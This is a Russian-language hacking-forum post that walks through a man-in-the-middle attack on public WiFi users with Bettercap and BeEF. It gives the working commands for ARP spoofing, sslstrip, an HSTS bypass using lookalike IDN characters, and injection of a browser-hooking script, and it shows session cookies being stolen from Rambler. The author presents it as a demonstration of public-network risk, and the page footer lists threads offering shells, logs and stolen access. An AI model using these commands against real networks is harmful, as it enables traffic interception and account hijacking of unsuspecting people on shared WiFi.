Вскрытие трафика в публичных сетях

H

Hackers Academy

Original poster
Вскрытие трафика в публичных сетях
Вскрытие трафика в публичных сетях, изображение №1



Эта статья о том, как стать кулхацкером (или по-английски Script Kiddie) — условным злоумышленником, который испытывает недостаток знаний в области программирования и использует существующее программное обеспечение, чтобы провести атаку на смартфоны и планшеты своих одноклассников.
Шучу. На самом деле передо мной стояла задача понять две вещи:
  1. Насколько опасно пользоваться публичным WiFi в 2020 году, в мире где господствуют браузеры и сайты с повсеместно победившими технологиями HTTPS (на основе TLS 1.1+) и HSTS
  2. Сможет ли человек моего уровня знаний (не самого высокого) “залезть” в чужой браузер и стащить ценные данные.
Ответ
  1. Да, Опасно!
  2. Вполне сможет
Отправная точка
Сразу скажу, что хотя часть моих опытов проходил в настоящих публичных сетях, “неправомерный доступ” я получал только к браузерам своих собственных устройств. Поэтому фактически

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

я не нарушал, и Вам настоятельно нарушать не советую. Данный эксперимент и статья предлагаются к ознакомлению исключительно в целях демонстрации небезопасности использования публичных беспроводных сетей.
И так, в чем собственно проблема для хакера, если в трафик в открытых беспроводных сетях легко перехватить любым сниффером? Проблема в том, что в 2020 году почти все (99%) сайты используют HTTPS и шифруют весь обмен данными между сервером и браузером потенциальной “жертвы” индивидуальным ключом по довольно свежему протоколу TLS. TLS даёт возможность клиент-серверным приложениям осуществлять связь в сети таким образом, что нельзя производить прослушивание пакетов и осуществить несанкционированный доступ. Точнее прослушивать-то можно, но толка в этом нет, так как зашифрованный трафик без ключа для его расшифровки бесполезен.
Более того, во всех современных браузерах реализован механизм HSTS (HTTP Strict Transport Security), принудительно активирующий защищённое соединение через протокол HTTPS и обрывающий простое HTTP-соединение. Данная политика безопасности позволяет сразу же устанавливать безопасное соединение вместо использования HTTP-протокола. Механизм использует особый заголовок Strict-Transport-Security для принудительного использования браузером протокола HTTPS даже в случае перехода по ссылкам с явным указанием протокола HTTP (http://). Исходный вариант HSTS не защищает первое подключение пользователя к сайту, что оставляет лазейку для хакеров, и злоумышленник может легко перехватить первое подключение, если оно происходит по протоколу http. Поэтому для борьбы с этой проблемой большинство современных браузеров использует дополнительный статический список сайтов (HSTS preload list), требующих использования протокола https.
Чтобы как-то перехватить вводимые пароли или украсть cookies жертвы нужно как-то влезть в браузер жертвы или добиться, чтобы протокол шифрования TLS не использовался. Мы сделаем обе вещи сразу. Для этого мы применим метод атаки “человек посередине” (MitM). Оговорюсь, что наша атака будет довольно низкопробной, потому что мы будем использовать готовые “конструкторы-полуфабрикаты” из журнала “Хакни Сам” практически без какой-либо доработки. Настоящие хакеры вооружены более качественно, а мы только играем роль низкоквалифицированных кулхацкеров, чтобы проиллюстрировать степень небезопасности публичных современных беспроводных сетей.
Железо
В качестве инструментария для эксперимента я использовал следующий инструментарий:
  • Любая публичная WiFi сеть на фудкорте
  • Нетбук Acer Aspire one D270
  • Встроенная wifi карта Atheros AR5B125
  • Внешний wifi usb адаптер WiFi TP-LINK Archer T4U v3
  • Внешний wifi usb адаптер TP-LINK Archer T9UH v2
  • Kali Linux c версией ядра 5.8.0-kali2-amd64
  • Фреймворк

    Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

    v2.28
  • Фреймворк

    Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

    0.5
  • Несколько смартфонов и планшетов на Android 9 и ноутбук на Windows 7 в качестве устройств-жертв.
Зачем так много wifi-карт? Да потому, что в процессе экспериментов я наступил на кучу граблей и пытался сэкономить. Оказалось, хорошая WiFi-карта — главный инструмент успешного злоумышленника. Тут целый ряд проблем: карта должна поддерживать мониторинга (monitor) и точки доступа (AP), для нее должны быть драйвера под вашу версию ядра Linux, у карты должна быть хорошая антенна и возможность управления мощностью сигнала. Если не хотите лишних граблей — берите дорогой адаптер из самого верха этого списка и не забудьте проверить наличие драйвера именно для вашей аппаратной ревизии карточки.
У встроенной карты Atheros AR9485 была великолепная поддержка всех режимов и драйвер “из коробки” в Kali, но невозможность управлять мощностью сигнала и слабая антенна сводили на нет эффективность данной карты на фазе активного вмешательства в трафик.
У WiFi TP-LINK Archer T4U v3 не было драйвера из коробки, а тот который я нашел на Github, не имел поддержки режима точки доступа (AP) и его нужно было компилировать самостоятельно.
Карточка TP-LINK Archer T9UH v2 заработала идеально с драйвером из коробки, на ней то у меня все и получилось.
Софт


Coub0:00

Первым делом я установил Kali Linux 5.8.0 на свой ноутбук. Единственный SSD в ноутбуке был пустым и предназначался целиком для эксперимента, что избавило меня от некоторых трудностей с разбивкой разделов и резервным копированием старых данных с него, поэтому при установке я использовал все варианты “по умолчанию”. Я все же столкнулся некоторыми тривиальными проблемами вроде потери монтирования флешкис дистрибутивом в процессе установки и обновления системы до последней актуальной версии из репозитория.
Вскрытие трафика в публичных сетях, изображение №2



Затем нужно было запустить инструменты проникновения, ими будут Bettercap и BeEF. С их помощью мы принудим браузеры “жертв” отказаться от шифрования трафика и внедрим в просматриваемые сайты троянский JavaScript.
Bettercap — это полный, модульный, портативный и легко расширяемый инструмент и фреймворк с диагностическими и наступательными функциями всех видов, которые могут понадобиться для выполнения атаки “человек посередине”. Bettercap написан на Go, основная разработка проекта проходила до 2019 года, сейчас происходят лишь небольшие исправления. Однако, как мы увидим позднее этот инструмент в быстро меняющемся мире информационной безопасности сохраняет свою актуальность и на закате 2020 года. Bettercap поставляется со встроенным модулями arp spoof и sslstrip. Именно Bettercap перехватывать трафик и внедрять в него вредоносную нагрузку.
SSlstrip — это специализированный прокси-сервер, который позволяет организовать один из способов обхода HTTPS для перехвата трафика — разбиение сессии пользователя на два участка… Первый участок от клиента до прокси сервера будет идти по протоколу HTTP, а второй участок, от прокси до сервера будет проходить, как и должен, по шифрованному соединению. SSLstrip позволяет разрезать сессию “жертвы” на две части и перехватить трафик для дальнейшего анализа, а также предоставлять автоматические редиректы на динамически создаваемые HTTP двойники страниц.
arp spoof перехватывает пакеты в локальной проводной или беспроводной сети с коммутацией. arpspoof перенаправляет пакеты от целевого хоста (или всех хостов) сети, предназначенные для другого хоста в этой сети, путём подмены ARP ответов. Это очень эффективный способ сниффинга трафика на коммутаторе или wifi-роутере.
BeEF — это фреймворк, позволяющий централизованно управлять пулом зараженных через XSS-атаку (сross-site scripting) клиентов, отдавать им команды и получать результат. “Злоумышленник” внедряет на уязвимый сайт скрипт hook.js. Скрипт hook.js из браузера “жертвы” сигналит управляющему центру на компьютере “злоумышленника” (BeEF) о том, что новый клиент онлайн. “Злоумышленник” входит в панель управления BeEF и удаленно управляет зараженными браузерами. Я использовал версии Bettercap v2.28 и BeEF 0.5 Они оба уже есть в составе Kali Linux 5.8.0 Открываем окно командной строки и вводим команду
sudo beef-xss
Вскрытие трафика в публичных сетях, изображение №3



Стартует первая часть нашего зловредного бутерброда — фреймворк BeEF. Теперь запустим браузер (в Kali Linux обычно это Firefox), переходим по адресу

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

, логин и пароль по умолчанию beef:beef, после чего мы попадаем в контрольный пункт управления нашей атаки.
Вскрытие трафика в публичных сетях, изображение №4



Оставляем вкладку с BeEF открытой, мы в нее вернемся позже. Перейдем к второй части бутерброда — Bettercap. Тут был подводный камень — Bettercap, уже имевшийся в системе, отказывался стартовать сервисом и выдавал другие непонятные мне ошибки. Поэтому я его решил удалить и поставить заново вручную. Открываем окно командной строки и выполняем команды:
sudo apt remove bettercap
sudo rm /usr/local/bin/bettercap
Затем

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

версию Bettercap v2.28 в архиве в папку загрузки. Обратите внимание, что я выбрал версию для своей архитектуры ядра. Теперь распаковываем и размещаем исполняемый файл в системе Bettercap в папку, предназначенную для ручной установки.
сd загрузки
unzip bettercap_linux_amd64_v2.28.zip
sudo mv bettercap /usr/local/bin/
Самый простой способ начать работу с Bettercap —

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

пользователя. Веб-интерфейс работает одновременно с сервисом rest API и интерактивной сессией командной строки. Чтобы установить веб-интерфейс нужно выполнить команду:
sudo bettercap -eval "caplets.update; ui.update; q"
Внимание! Уже на этом этапе нужно обязательно подключиться к атакуемой беспроводной сети, получить ip-адрес для беспроводного интерфейса атакующей машины и запомнить его (команда ifconfig поможет его узнать). Bettercap понимает как отдельные команды из командной строки так и каплеты. Каплет — это просто текстовый файл со списком команд, которые будут выполнены последовательно. Для запуска веб-интерфейса используется http-ui caplet. Посмотреть и изменить учетные данные по умолчанию в нем можно по пути /usr/local/share/bettercap/caplets/http-ui.cap. Запуск Bettercap с веб интерфейсом модулями api.rest и http.server 127.0.0.1 производится командой
sudo bettercap -caplet http-ui
Вскрытие трафика в публичных сетях, изображение №5



Теперь можно открыть в браузере еще одну вкладку с адресом 127.0.0.1 (без номера порта!) и войти в систему, используя учетные данные, которые были подсмотрены или настроены на предыдущем шаге (обычно это user/pass).
Вскрытие трафика в публичных сетях, изображение №6



Веб-интерфейс Bettercap полностью дублирует командную строку, поэтому все действия которые мы будем делать из командной строки, можно сделать и из веб-интерфейса (запуск модулей, смена режимов, просмотр изменение значение переменных, вывод диагностической информации) Продолжаем в командной строке и проведём первоначальную разведку беспроводной сети, к которой мы уже подключены в качестве обычного клиента.
net.recon on
net.probe on
Net.show
net.recon off
net.recon on — Запускает обнаружение сетевых хостов.
net.probe on — Запускает активное зондирование новых хостов в сети через отправку фиктивных пакетов каждому возможному IP в подсети.
net.show — Даёт команду отобразить список кэша обнаруженных хостов.
net.probe off — Выключает модуль активного зондирования. Настраиваем переменные Bettercap, чтобы он:
  • работал как прозрачный прокси (transparent proxy) и “отключал” шифрование браузерного обмена “жертв” модулем sslstrip,
  • внедрял им вредоносную нагрузку (

    Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

    — скрипт BeEF, используйте IP, выданный роутером вашему адаптеру в атакуемой сети),
  • обходил механизм HTST методом замены адреса в адресной строке браузера жертвы на похожие интернационализированные символы.
Команды:
set http.proxy.sslstrip true
set http.proxy.injectjs

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


set http.proxy.sslstrip.useIDN true
Затем запускаем атаку против пользователей беспроводной сети: Команды
arp.spoof on
http.proxy on
Вскрытие трафика в публичных сетях, изображение №7



arp.spoof on — Запускает отравление ARP кеша устройств “жертв”, этот модуль перенаправлять трафик на беспроводной интерфейс “злоумыщленника”
http.proxy on — Запускает прозрачный прокси, этот модуль создает прокси сервер, который будет ловить весь переадресованный трафик и модифицировать его в интересах “злоумышленника”. “Жертвы” начинают пользоваться интернетом, заходить на сайты, и в случае успеха атаки будут лишены транспортного шифрования (а значит станут доступны для прямого прослушивания любым сниффером) и будут получать себе вредоносный скрипт BeEF. Скрипт BeEF, выполнялась в контексте домена, в чью страницу он был внедрен, может выполнить много разных действий, например утащить cookies или украсть вводимые пароли.
Вскрытие трафика в публичных сетях, изображение №8



Как и положено наспех сделанному бутерброду, атака сработает далеко не на все сайты. Например, крайне маловероятно провернуть атаку с одним из сайтов Google, так как в браузере уже есть список HSTS preload list для некоторых сайтов. Но вот “хайджекнуть” Рамблер или Coub.com оказалось вполне возможно! Если мы попросим “жертву” (социальная инженерия, куда ж без нее) открыть адрес Ro.ru, или вдруг она сама это сделает, то произойдет вот что:
Вскрытие трафика в публичных сетях, изображение №9



Вскрытие трафика в публичных сетях, изображение №10



Весь трафик жертвы на сайт rambler.ru летит по воздуху открытым текстом и его можно прослушать любым сниффером. В то время как в браузере “жертвы” не будет почти никаких признаков беды, кроме малозаметного треугольника и еще одного странного символа в конце адресной строки.
Вскрытие трафика в публичных сетях, изображение №11



А на машине “злоумышленника” в контрольной панели фреймворка BeEF, в разделе Online Browsers тем временем появится запись о новом браузере, пойманном на крючок. Выбираем этот браузер мышью, переходим в суб-вкладку Commands, на каталог Browsers, потом последовательно Hooked domain → Get Cookie → Execute
Вскрытие трафика в публичных сетях, изображение №12



Раз, и парой парой кликов мышки мы украли у жертвы сессионные cookies сайта Rambler.ru. Теперь мы можем попытаться вставить их в свой браузер и попасть в сессию жертвы. И это только вершки! А ведь в арсенале BeEF еще несколько сотен различных “команд”, которые мы можем отправить “пойманному” браузеру: различные варианты фишинга, кража паролей, рикролы, редиректы, эксплоиты…
Выводы
Выводы по результатам эксперимента неутешительные. Браузеры еще не могут на 100% защитить пользователей от вмешательства в трафик или подмены настоящего сайта фишинговым. Механизм HSTS срабатывает только для пары тысяч самых популярных сайтов и оставляет без надежной защиты миллионы других. Браузеры недостадочно явно предупреждают о том, что соединение с сервером не зашифровано. Еще хуже дело обстоит в беспроводных сетях, где доступ к среде передачи данных есть у любого желающего, при этом почти никто из пользователей вообще никак не проверяет подлинность самой точки доступа, а надежных методов проверки подлинности точек доступа просто не существует.

С вами был ФСБ! Надеюсь тебе понравилась моя статья. Подписывайся на мой профиль UfoLabs и на мой телеграм канал

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

 
Название темы
Автор Заголовок Раздел Ответы Дата
Admin Вскрытие роутеров через пользователя Уязвимости и взлом 2
CoderUnicorn Приветствуем всех, кто заинтересован в арбитраже трафика на платформах Google и Facebook! Предоставляю работу. Ищу специалиста. 0
whitepagessupp Продавец Генератор White Pages для залива трафика - 1.30$ за 1 вайт Трафик, загрузки, инсталлы, iframe 0
Support81 Тайный декодер: ЕС вводит новые правила перехвата веб-трафика Новости в сети 0
I Прием: Шеллы, лом, дорвеи, любой спам, pops и другие источники не целевого трафика Доступы - FTP, shell'ы, руты, sql-inj, БД 5
B Продам BeeClick - Эффективный сервис для фильтрации трафика Все что не подошло по разделу 2
Denik Интересно [Арбитраж Трафика] Ракета: источники бесплатного трафика (2022) Другое 0
DOMINUS Интересно В России скоро появится система полного контроля интернет-трафика Новости в сети 3
T Арбитраж трафика. Правильный залив на гемблу Корзина 0
O Ищу годный арбитраж трафика! Парни, кто льёт трафик, напиши в тг, ЕСТЬ РАБОТА! Предоставляю работу. Ищу специалиста. 2
M Закрыто Сделаем много поискового трафика Google ads на любые ваши ленды. Корзина 1
M Закрыто Продам логи без единого соседа с личного трафика - дорого - Gpay, Facebook и любые другие ваши линки! Корзина 1
Cpa Monstro CPAMonstro - это группа экспертов в области маркетинга, арбитража трафика, SEO и SMM. Свободное общение и флейм 8
st.ap Схема по заработку на конвертации трафика из ютуба на кинопартнёрку. Способы заработка 1
andre5787 Арбитраж трафика от Василия Нашибы Способы заработка 0
W [Александр Пуминов] Арбитраж трафика через YouTube (2021) Способы заработка 2
R $ Фарм для абузеров трафика (дефолт) \\ Топ 1 сайт для накрутки Инсты $ Способы заработка 0
Admin Интересно Создание своего Shadowsocks и обфускация трафика [Часть 1] Настройка системы для работы 2
P Продам Скрипт rtb exchange suite - система перепродажи трафика dsp/ssp в реальном времени. Сайты/Хостинг/Сервера 1
H Заработок на арбитраже трафика в своем сообществе Вконтакте в 2021м году Способы заработка 2
H Интересно Kismet — прослушка трафика Полезные статьи 0
C CBDPartners - лучшее решение для CBD трафика, запрыгивай в новую нишу! Корзина 0
S Продам Сим-карты свободные от трафика Все что не подошло по разделу 0
E Потоки трафика US EU RU MIX Трафик, загрузки, инсталлы, iframe 0
C [Слив] Буржуазный арбитраж трафика сотни $ в день (2020) Способы заработка 0
Y Анонимность и Безопасность в Сети ч4 – Разделения трафика Анонимность и приватность 0
R R-Money.ru - партнерская программа по монетизации образовательного трафика! Ищу работу. Предлагаю свои услуги. 16
O Кейс по сливу трейдинг-трафика из Instagram и Telegram с ROI 187%. Предоставляю работу. Ищу специалиста. 0
S Виды шифрования и защиты трафика, выбор софта. Справочник анонима. Полезные статьи 1
B Заработок на сливе трафика из Facebook Программирование 4
A Арбитраж трафика с 0 или целевые посетители по 70 копеек Программирование 0
B Схема извлечения трафика из Ютюба с конвертацией на кинопартнерке. Программирование 0
J Проверено [ПАРТНЕРКА] Выгодная монетизация вашего трафика! Roi777.com Трафик, загрузки, инсталлы, iframe 0
Admin Prefix hijacking. Используем RPKI для борьбы с потерей трафика Полезные статьи 0
A Бесплатное обучение арбитражу трафика с Facebook. Другое 3
A Бесплатное обучение арбитражу трафика с Facebook. Способы заработка 3
C Roi777.com - Выгодная монетизация вашего трафика! Трафик, загрузки, инсталлы, iframe 1
K Продажа трафика. ПО критериям. Трафик, загрузки, инсталлы, iframe 0
АнАлЬнАя ЧуПаКаБрА INLINE Сервис монетизации трафика Проекты Private Keeper 0
АнАлЬнАя ЧуПаКаБрА INLINE Монетизация трафика Проекты Private Keeper 1
S Слив мануала по арбитражу трафика за 75 к Способы заработка 8
M 54 способа добычи трафика Способы заработка 0
X Добыча Американского трафика для сайта Способы заработка 0
R Лучший инструмент для получения трафика для продвижения в Telegram. Продажа софта 3
F Арбитраж трафика | Серое Способы заработка 1
R Закрыто Аккаунт зарубежной биржи трафика Корзина 13
V Предотвращаем утечку трафика при падении VPN Полезные статьи 0
G Интересно [Промокод] Linken Sphere — многопоточный браузер / антидетект / арбитраж трафика / мультиаккаунтинг Анонимность и приватность 8
K YouTubeMonster - комбайн для добычи трафика. Другое 4
S Арбитраж трафика в Facebook Другое 0

Название темы